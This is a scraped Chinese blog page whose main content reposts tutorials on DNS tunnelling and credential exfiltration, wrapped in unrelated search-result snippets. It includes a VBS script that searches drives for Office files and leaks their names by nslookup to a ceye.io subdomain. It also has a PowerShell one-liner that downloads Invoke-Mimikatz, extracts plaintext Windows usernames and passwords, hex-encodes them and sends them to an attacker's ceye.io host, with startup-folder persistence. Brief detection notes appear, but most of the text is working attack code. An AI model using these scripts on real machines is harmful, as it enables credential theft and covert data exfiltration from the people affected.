精华内容
下载资源
问答
  • Tunnel improvements

    2021-01-09 03:38:18
    * Message (de)serialization * Before Twisted writes to a socket, it first spends a lot of time in <code>isIPAddress</code> / <code>isIPv6Address * Remove <code>isinstance</code> calls from byte ...
  • <div><p>WIP, mais utilisation d'une PR pour faciliter la revue.</p><p>该提问来源于开源项目:betagouv/beta.gouv.fr</p></div>
  • The Channel Tunnel

    2019-09-19 00:44:59
    原文 In 1858, a French engineer, Aime Thome De Gamond, arrived in England with a plan for a twenty-one-mile tunnel under the English Channel....


    原文

    In 1858, a French engineer, Aime Thome De Gamond, arrived in England with a plan for a twenty-one-mile tunnel under the English Channel. He said that it would be possible to build a platform in the center of the Channel. This platform would serve as a port and a railway station. The tunnel would be well-ventilated if tall chimneys were built above sea level. In 1860, a better plan was put forward by an Englishman, William Low. He suggested that a double railway-tunnel should be built. This would solve the problem of ventilation, for if a train entered this tunnel, it would draw in fresh air behind it. Forty-two years later a tunnel was actually begun. If, at the time, the British had not feared invasion, it would have been completed. The world had to wait almost another 100 years for the Channel Tunnel. It was officially opened on March 7, 1994, finally connecting Britain to the European continent.


    译文

    在1858年,一个叫爱梅.托梅.德.干蒙的法国工程师有了一个在英吉利海峡下面修一条21英里隧道到达英格兰的想法。他说可以在海峡中间建一个平台。这个平台可以作为一个港口和火车站提供服务。如果建一些巨大的烟囱穿过海平面就能为隧道提供良好的通风。在1860年, 一个更好的主意被一个英国威廉.提出。他的建议是修一条双铁路隧道。这样解决通风的问题,如果有一列火车进入隧道,它会将新鲜的空气抽进来。42年之后隧道已经开工了。如果不是那个时候,英国人担心入侵的话,隧道早就建好了。世界人民不得不等待这条海底隧道接近100年才完工。它最终是是在1994年4月7号开通,最终英格兰连接到欧洲大地上。

    转载于:https://my.oschina.net/robinsonlu/blog/517749

    展开全文
  • <p>An experimental implementation (by ) already <a href="https://github.com/devos50/tribler/commit/71402bff2db51e2e14d671642907d6c9069de5d7">exists</a> for reference. One possible backward compatible ...
  • SSH domain.de port 2212 username sshkey mysql localhost 3306 username password databasename <p><strong>To Reproduce I don't know how to comprehend this. But in the screen you can see quite well ...
  • Tunnel quantity in leaseset

    2020-11-29 09:48:18
    <div><p>According to the i2pc spec https://geti2p.net/de/docs/protocol/i2cp up to 16 tunnels in a leaseset should be supported ( minus a few to be on the safe side ). My understanding is that ...
  • <ol><li>When ovs-dpdk has some tunnel ports, I can see the listening ports through the command <code>ovs-appctl tnl/ports/show -v</code>.</li><li>When one tunnel port is deleted, the listening ports ...
  • 7242de43a41b265593667276bbafab9621f7747ce0de5f19f40e5cefdcbac907, nodePort=40000]. ..09:57:32.351 [AutoStartProxyPoolPoller] INFO d.z.e.z.p.DockeredSeleniumStarter - Created container [docker_...
  • SHA256: bd92aef20fb8dbbfddbc8f3b29d2452f6e04bd02e65b534cedaf14e29fd387de </bigon.org></code></pre> Session info: <pre><code> > library(ssh) > library(mongolite) > devtools::session_...
  • apparently creates a name that the ngrok api is not able to process correctly, specifically for listing tunnel info or deleting tunnel. <p><strong>Steps to Reproduce</strong></p> <pre><code> from ...
  • <div><p>identificar os lugar onde ainda accrescentamos parametros nos on_change e tentar o usar o web_context_tunnel para aumentar a compatibilidade com os outros modulos.</p> <p>Tentar obter merges ...
  • <img alt="farady-gui" src="https://img-blog.csdnimg.cn/img_convert/d89be1838c1f6d8de9655d18c83c1f6f.png" /> <p>Works fine when launched on the native terminal.</p><p>该提问来源于开源项目:...
  • <ul><li><img width="1177" alt="screen shot 2017-06-15 at 3 28 08 pm" src="https://img-blog.csdnimg.cn/img_convert/3b03d6757ad561677a015de8efcf2a94.png" /></li></ul> <h2>Notes <ul><li>The Sauce Tunnel ...
  • <div><p>Addressess issue #3143....(cherry picked from commit 200a4fdc76427265de0339d81ecf05cab5fd7067) <p>Conflicts: proxy/http/HttpSM.cc</p><p>该提问来源于开源项目:apache/trafficserver</p></div>
  • 移植到 openwrt/lede 的 Makefile 容易写,但是不懂lua语音,写不出 luci 界面,请帮忙,谢谢。</p><p>该提问来源于开源项目:wangyu-/udp2raw-tunnel</p></div>
  • s status message the kubectl command creates a tunnel to the dashboard pod and the name of this pod is missing the first character : <pre><code>powershell (Get-Job -Name 'Kubectl-Tunnel')....
  • ’écran de 2020-02-28 14-28-13" src="https://user-images.githubusercontent.com/10830260/75552626-9dc2b480-5a2e-11ea-8671-8a18eaebd2e1.png" /></p> <p><strong>Expected behavior Field and value should ...
  • 3 com.thepeppersstudio.MongoHub 0x000000010003d73a -[Tunnel readStatus] + 171 4 com.thepeppersstudio.MongoHub 0x0000000100021baa -[ConnectionWindowController checkTunnel] + 257 5 ...
  • <p><img alt="tunnel" src="https://img-blog.csdnimg.cn/img_convert/4a20407da448d2f0e90d52400b8942f8.gif" /></p> <h3>Check list <p>Check if done. <p>Strikethrough if not relevant: ~~example~~ ...
  • <div><p>Prior to this change, HTTP/2 has its own ChunkedHandler and do de-chunk in Http2Stream. But think about HTTP/1.0, it doesn't support chunked transfer coding either, but HttpTunnel can ...
  • <a href="https://github.com/vatesfr/xen-orchestra/blob/b24400b21de1ebafa1099c56bac1de5c988d9202/%40xen-orchestra/cron/src/parse.spec.js"><code>cron/parse.spec.js</code></a>)</li><li>[ ] if <code>xo-...
  • Access Challenge (11), id: 0x08, Authenticator: 113c2de5c5f0785a7b67d8a41c052930 </code></pre> <p>This is where the client will start to complain. eapol_test (of wpa_supplicant) says shis: <pre>...
  • <div><p>This commit modifies the /lib/netifd/proto/gre.sh script so that, when GRE-TAP tunnels are created, either IPv4 or IPv6, the prefix before the chosen ...lede-project/source</p></div>
  • <div><p>This is a bug report for confirmation errors on KNX tunnel connections that don't happen only through polling (i.e....A description of this problem can be found in the thread ...
  • <div><p>该提问来源于开源项目:Kevin-De-Koninck/Clean-Me</p></div>
  • 摘自:https://hk.saowen.com/a/a06909f1c57cb8452db969b3deede4151de42a7d69f4bb52c5bf027033fb91bd Powershell dns實驗驗證: 1、 利用powershell構造dns隧道 a) 編寫一個最簡單的一句話腳本,獲取服務列表 ...

    摘自:https://hk.saowen.com/a/a06909f1c57cb8452db969b3deede4151de42a7d69f4bb52c5bf027033fb91bd

    Powershell dns實驗驗證:

    1、 利用powershell構造dns隧道

    a)      編寫一個最簡單的一句話腳本,獲取服務列表

    b)      使用nishang的Out-NnsTxt將腳本GetServiceToTxt.ps1轉換為txt記錄

    c)      在dns服務器創建對應txt記錄(後續執行需按照1,2,3,4的順序,所以創建記錄名為1)

    驗證結果,ok

    d)      使用nishang的DNS_TXT_Pwnage讀取txt並執行( 腳本自動在test.com前加1,向1.test.com請求txt記錄作為腳本執行。不過筆者最終也沒搞懂stopstring這個參數的原理,懂的朋友麻煩私信下,謝謝! ),可正常獲取服務列表。

    命令和結果如下:

    DNS_TXT_Pwnage -startdomainstartflag.test.com -cmdstring nostart -commanddomain  txt1.test.com -psstring startflag -psdomain test.com -Subdomains 1 -stopstring stopflag

    2、 外傳結果抓包:

    使用Microsoft Network Monitor抓包分析

    3、 檢測邏輯匹配分析:

    a)      因實驗未將結果外傳,所以域名長度不大,如dns隧道外傳則必使用長域名

    b)      因實驗未將結果外傳,所以頻率不高,且只獲取遠端的get-server功能,頻率也不高,但要實現外傳和獲取更多功能(如mimikatz等),則必然需要高頻率

    c)      類型為TXT,有回包

    d)      無A記錄解析結果,也就無進程對結果發起訪問

    e)      此實驗場景未覆蓋外傳數據,所以不涉及註冊問題

    結論:遠控木馬(實驗功能較單一,擴展為大馬則可精確覆蓋檢測特徵)

    利用ceye.io的外傳實驗驗證

    1、   少量信息竊取和大量信息竊取

    a)      單次少量信息竊取外傳,簡單利用windows命令(ping、nslookup等)即可竊取機器名

    b)      多次大量信息竊取,編寫腳本,搜索文檔(word、excel、ppt),並外傳文檔名(此腳本360 未報警),vbs腳本內容如下 ( 代碼未充分驗證,不保證無錯誤,中文支持或讀文檔內容請自行修改) :

    'On ErrorResume Next

    Set fso =CreateObject("Scripting.FileSystemObject")

    toolsName=Array(".docx",".doc",".xls",".xlsx",".ppt",".pptx")

    'ConstDRIVE_LETTERS="C:D:E:F:G:H:I:J:K:L:M:N:O:P:Q:R:S:T:U:V:W:X:Y:Z"

    ConstDRIVE_LETTERS="o"

    ''''''''''''開始搜索

    CallScanDrives()                      

    ''''''''''''''''''''

    SubScanDrives()

    Dim drives

    drives=Split(DRIVE_LETTERS,":")

    For Each drv In drives

    If fso.DriveExists(drv) Then

    Set drive=fso.GetDrive(drv)

    If drive.isReady Then

    CallScanFiles(drive.RootFolder)

    End If

    End If

    Next

    End Sub

    ''''''''''''

    SubScanFiles(folder)

    For Each this_file In folder.Files

    On Error Resume Next

    Call FindKeyFile(this_file)

    WScript.Sleep 1

    Next

    For Each this_folder In folder.SubFolders

    On Error Resume Next

    Call ScanFiles(this_folder)

    WScript.Sleep 1

    Next   

    End Sub

    '''''''''''查找特定文檔

    SubFindKeyFile(file)

    On Error Resume Next

    For Each tool_name In toolsName

    'WScript.Echo

    ''''將文檔名都轉為大寫匹配

    IfInStr(UCase(file.name),UCase(tool_name)) <>0 Then

    DnsStr= file.name &".xxxxxxx.ceye.io"

    ''''進行靜默nslookup上傳   

    setobjShell=wscript.createObject("wscript.shell")

    objShell.exec("%comspec% /c nslookup " & DnsStr)

    End If

    Next

    End Sub

    2、 外傳結果展示:

    a)      單次少量信息竊取外傳

    b)      多次大量信息竊取

    3、 檢測邏輯匹配分析:

    a)      利用A記錄外傳,非txt回包,長度不超長(實驗原因,未充分利用域名長度),但頻率較高,解析過程未發現異常(但此截圖為8.8.8.8,非系統dns存在一定風險)

     

     

     

     

    利用Powershell和ceye.io实现Windows账户密码回传

    最近在研究Powershell的使用,之前我一直不习惯Windows的主要原因是他那孱弱的命令行工具,稍微了解了Powershell之后差点跪下了,真的是一款非常了不起的工具。powershell的定义是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。简单的理解就是像linux下的bash。powershell有着诸多的优点,但是仅凭无文件和操作系统自带这两大优点基本上确定了他的地位。mimikatz是一款黑客后渗透(不是提权)神器,其中一个功能是在管理员账户下获取Windows明文密码,现在也有powershell版本了。我想测试的流程就是通过powershell获取Windows信息之后提取关键的用户名和密码,将用户名和密码转码之后访问ceye.io,这样就可以拿到Windows账户信息了.

    0×01 mimikatz获取Windows内容保存到变量

    mimikatz现在已经有powershell版本了,而且是http传输,进行免杀要比exe容易,这里不探讨免杀的内容。

    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');

    $Mimikatzinfo = invoke-mimikatz;

    $Mimikatzinfo

    屏幕快照 2017-03-11 上午8.22.48.png

    0×02 利用powershell正则表达式提取关键内容

    屏幕快照 2017-03-11 上午8.25.43.png

    分析字段,我们想要的是Username和Password之后的内容,powershell继承的是.net的表达式语法,实现上和python多少有点不同,查了半天资料总算实现了

    $Mimikatzinfo = invoke-mimikatz;

    $regex = [regex]".*Username : (.*?)\n.*\n.*Password : (.*?)\n";

    $word = ($regex.Matches($Mimikatzinfo)| %{$_.value})

    屏幕快照 2017-03-11 上午8.31.38.png

    想要的内容是word的第三个组

    $username=$word[2].split("*")[1].split(":")[1];
    $password=$word[2].split("*")[3].split(":")[1];
    $full=$username.trim()+"_"+$password.trim();

    屏幕快照 2017-03-11 上午8.34.13.png

    0×03 转码访问

    域名中不允许包含特殊字符,也出于绕过的想法,将用户名和密码进行16进制转换然后再访问(ceye.io要换成自己的)

    $ab = [System.Text.Encoding]::UTF8.GetBytes($full);

    $luffy=[System.BitConverter]::ToString($ab);$onepiece=$luffy.replace("-","");

    $wc=new-object System.Net.webclient;$result=$wc.downloadstring("http://"+$onepiece+".sss.ceye.io");

    Jietu20170311-084132.jpg

    0×04 实现开机自启动

    新建1.cmd

    PowerShell -Command "Set-ExecutionPolicy Unrestricted" >> "%TEMP%\StartupLog.txt" 2>&1 
    PowerShell C:\Users\Administrator\Desktop\script.ps1 >> "%TEMP%\StartupLog.txt" 2>&1

    新建script.ps1,一句话实现上述功能

    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');$Mimikatzinfo = invoke-mimikatz;$regex = [regex]".*Username : (.*?)\n.*\n.*Password : (.*?)\n";$word = ($regex.Matches($Mimikatzinfo)| %{$_.value});$username=$word[2].split("*")[1].split(":")[1];$password=$word[2].split("*")[3].split(":")[1];$full=$username.trim()+"_"+$password.trim();$ab = [System.Text.Encoding]::UTF8.GetBytes($full);$luffy=[System.BitConverter]::ToString($ab);$onepiece=$luffy.replace("-","");$wc=new-object System.Net.webclient;$result=$wc.downloadstring("http://"+$onepiece+".rzzz.ceye.io");

    把1.cmd放到启动文件夹里

    屏幕快照 2017-03-11 上午8.47.56.png

    Jietu20170311-085918.jpg

    0×05 解码

    $pass=""

    $t="41646d696e6973747261746f725f6c7566667931323321"

    $t -split '(.{2})' |%{ if ($_ -ne "") { $pass+=[CHAR]([CONVERT]::toint16("$_",16))  }}

    write $pass

    屏幕快照 2017-03-11 上午9.06.23.png

    后记

    powershell的强大不仅如此,对于黑客来说是一个超级宝库,现在针对powershell成型的黑客工具也越来越多,像是metasploit,powersploit,set。powershell的可编程和windows的紧密结合也可以实现各种各样的猥琐技巧,比如上面的利用启动文件夹实现开机自启动是很low的,powershell和wmi配合可以实现无文件启动。”路漫漫其修远兮 吾将上下而求索”。

    *本文作者:s1riu5,转载请注明来自Freebuf.COM

    转载于:https://www.cnblogs.com/bonelee/p/8259188.html

    展开全文
  • # 3496fb7de0441eafbd8c4f61577709db </code></pre> <p>And obviously the incoming packets are dropped by the ipv6 "Default deny all" rule. <p>Replacing both occurrences of <code>re0</code> (the ...
  • <div><p>http://firmware.koolshare.cn/LEDE_X64_fw867/ 这里的 lede 做的比较好 能否以 这个 lede 为模板 进行集成</p><p>该提问来源于开源项目:wangyu-/udp2raw-tunnel</p></div>

空空如也

空空如也

1 2 3 4 5 ... 12
收藏数 222
精华内容 88
关键字:

detunnel